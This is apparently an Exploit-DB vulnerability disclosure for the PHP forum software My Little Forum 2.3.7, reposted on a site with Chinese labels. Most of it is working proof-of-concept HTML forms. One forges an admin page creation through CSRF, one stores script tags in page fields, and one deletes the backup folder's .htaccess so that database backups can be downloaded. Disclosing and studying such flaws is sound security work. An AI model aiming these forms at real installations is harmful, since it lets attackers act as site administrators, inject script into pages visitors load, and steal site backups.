My Little Forum 2.3.7 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： Ashiyane Digital Security Team
  日期： 2016-11-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40676/

• Title:
  ======
  My Little Forum2.3.7 - Multiple Vulnerability
  
  
  Product & Service Introduction:
  ===============================
  My little forum is a simple PHP and MySQL based internet forum that 
  displays the messages in classical threaded view (tree structure). It is 
  Open Source licensed under the GNU General Public License. The main 
  claim of this web forum is simplicity. Furthermore it should be easy to 
  install and run on a standard server configuration with PHP and MySQL.
  
  
  Software Link:
  ==============
  https://github.com/ilosuna/mylittleforum/archive/master.zip
  
  
  Vulnerability Type:
  =========================
  Cross-Site Request Forgery
  Stored Cross-Site Scripting
  CSRF Allow To Backup Disclosure
  
  
  Vulnerability Details:
  ==============================
  This WebApplication is vulnerable and suffer from some vulnerablity.
  
  
  Severity Level:
  ===============
  High
  
  
  Proof of Concept (PoC):
  =======================
  1. CSRF (Add Page)
  With this exploit can add page in webapp.
  <form 
  action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
  method="post" accept-charset="utf-8">
  <input type="hidden" name="mode" value="admin">
  <input type="hidden" name="title" value="Title">
  <input type="hidden" name="content" value="Content">
  <input type="hidden" name="menu_linkname" value="Name">
  <input type="submit" name="edit_page_submit" value="OK - Save page">
  </form>
  
  
  2. Stored XSS:
  <form 
  action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" 
  method="post" accept-charset="utf-8">
  <input type="hidden" name="mode" value="admin">
  <input type="hidden" name="title" value="Stored XSS 
  <script>alert(1)</script>">
  <input type="hidden" name="content" value="Stored XSS 
  <script>alert(2)</script>">
  <input type="hidden" name="menu_linkname" value="Stored XSS 
  <script>alert(3)</script>">
  <input type="submit" name="edit_page_submit" value="OK - Save page">
  </form>
  
  3. Backup Disclosure:
  with this exploit we can delect htaccess in backup folder for access to 
  backups.
  <form action="http://localhost/mylittleforum-master/index.php" 
  method="post" accept-charset="utf-8">
  <div>
  <input type="hidden" name="mode" value="admin">
  <input type="hidden" name="delete_backup_files[]" value=".htaccess">
  <input type="submit" name="delete_backup_files_confirm" value="OK - 
  Delete">
  </div>
  </form>
  Next use exploit go to:
  http://localhost/mylittleforum-master/backup/
  
  
  
  Author:
  ==================
  Ashiyane Digital Security Team